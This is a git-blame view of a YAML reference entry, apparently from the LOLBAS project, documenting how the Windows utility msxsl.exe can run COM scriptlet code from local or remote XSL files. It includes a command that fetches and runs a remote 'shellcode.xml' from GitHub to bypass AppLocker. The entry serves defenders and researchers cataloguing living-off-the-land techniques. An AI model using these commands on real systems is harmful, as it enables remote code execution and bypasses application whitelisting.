2018-06-09 00:15:06 +02:00
|
|
|
---
|
|
|
|
Name: msxsl.exe
|
2018-09-22 04:58:00 +02:00
|
|
|
Description: Command line utility used to perform XSL transformations.
|
|
|
|
Author: 'Oddvar Moe'
|
2018-06-09 00:15:06 +02:00
|
|
|
Created: '2018-05-25'
|
|
|
|
Commands:
|
2018-10-05 21:06:01 +02:00
|
|
|
- Command: msxsl.exe customers.xml script.xsl
|
|
|
|
Description: Run COM Scriptlet code within the script.xsl file (local).
|
|
|
|
Usecase: Local execution of script stored in XSL file.
|
|
|
|
Category: Execute
|
|
|
|
Privileges: User
|
|
|
|
MitreID: T1218
|
|
|
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
|
|
OperatingSystem: Windows
|
2018-06-09 00:15:06 +02:00
|
|
|
- Command: msxsl.exe customers.xml script.xsl
|
|
|
|
Description: Run COM Scriptlet code within the script.xsl file (local).
|
2018-09-22 04:58:00 +02:00
|
|
|
Usecase: Local execution of script stored in XSL file.
|
|
|
|
Category: AWL Bypass
|
|
|
|
Privileges: User
|
|
|
|
MitreID: T1218
|
|
|
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
|
|
OperatingSystem: Windows
|
2018-10-05 21:06:01 +02:00
|
|
|
- Command: msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
|
|
|
|
Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
|
|
|
|
Usecase: Local execution of remote script stored in XSL script stored as an XML file.
|
|
|
|
Category: Execute
|
|
|
|
Privileges: User
|
|
|
|
MitreID: T1218
|
|
|
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
|
|
OperatingSystem: Windows
|
2018-06-09 00:15:06 +02:00
|
|
|
- Command: msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
|
|
|
|
Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
|
2018-09-22 04:58:00 +02:00
|
|
|
Usecase: Local execution of remote script stored in XSL script stored as an XML file.
|
|
|
|
Category: AWL Bypass
|
|
|
|
Privileges: User
|
|
|
|
MitreID: T1218
|
|
|
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
|
|
|
OperatingSystem: Windows
|
2018-06-09 00:15:06 +02:00
|
|
|
Full Path:
|
2018-09-26 11:41:58 +02:00
|
|
|
- Path:
|
|
|
|
Code Sample:
|
|
|
|
- Code:
|
|
|
|
Detection:
|
|
|
|
- IOC:
|
2018-06-09 00:15:06 +02:00
|
|
|
Resources:
|
2018-09-26 11:41:58 +02:00
|
|
|
- Link: https://twitter.com/subTee/status/877616321747271680
|
|
|
|
- Link: https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker
|
|
|
|
Acknowledgement:
|
|
|
|
- Person: Casey Smith
|
|
|
|
Handle: '@subtee'
|
|
|
|
---
|